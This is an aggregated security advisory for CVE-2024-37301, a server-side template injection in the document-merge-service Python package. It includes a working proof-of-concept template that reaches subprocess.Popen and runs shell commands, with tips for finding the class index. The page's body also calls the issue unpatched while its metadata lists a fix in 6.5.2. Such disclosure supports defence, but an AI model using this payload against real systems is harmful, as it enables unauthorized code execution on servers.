Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS12NWdmLXI3OGgtNTVxNs4AA88z
document-merge-service vulnerable to Remote Code Execution via Server-Side Template Injection
Impact
What kind of vulnerability is it? Who is impacted?
A remote code execution (RCE) via server-side template injection (SSTI) allows for user supplied code to be executed in the server's context where it is executed as the document-merge-server user with the UID 901 thus giving an attacker considerable control over the container.
Patches
Has the problem been patched? What versions should users upgrade to?
It has not been patched.
References
Are there any links users can visit to find out more?
POC
Add the following to a document, upload and render it:
{% if PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202] %}
ls -a: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("ls -a", shell=True, stdout=-1).communicate()[0].strip() }}
whoami: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("whoami", shell=True, stdout=-1).communicate()[0].strip() }}
uname -a:
{{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("uname -a", shell=True, stdout=-1).communicate()[0].strip() }}
{% endif %}
The index might be different, so to debug this first render a template with {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__() }} and then get the index of subprocess.Popen and replace 202 with that.
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12NWdmLXI3OGgtNTVxNs4AA88z
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Critical
Classification: General
Published: 3 months ago
Updated: 3 months ago
CVSS Score: 10.0
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Identifiers: GHSA-v5gf-r78h-55q6, CVE-2024-37301
References:
- https://github.com/adfinis/document-merge-service/security/advisories/GHSA-v5gf-r78h-55q6
- https://nvd.nist.gov/vuln/detail/CVE-2024-37301
- https://github.com/adfinis/document-merge-service/commit/a1edd39d33d1bdf75c31ea01c317547be90ca074
- https://github.com/advisories/GHSA-v5gf-r78h-55q6
Blast Radius: 1.0
Affected Packages
pypi:document-merge-service
Dependent packages: 0Dependent repositories: 0
Downloads: 603 last month
Affected Version Ranges: < 6.5.2
Fixed in: 6.5.2
All affected versions: 5.2.0, 5.2.1, 6.0.0, 6.1.0, 6.1.1, 6.1.2, 6.2.0, 6.2.1, 6.2.2, 6.3.0, 6.3.1, 6.4.0, 6.4.1, 6.4.2, 6.4.3, 6.4.4, 6.4.5, 6.4.6, 6.5.0, 6.5.1
All unaffected versions: 6.5.2, 6.6.0, 6.6.1, 7.0.0, 7.0.1, 7.0.2, 7.1.0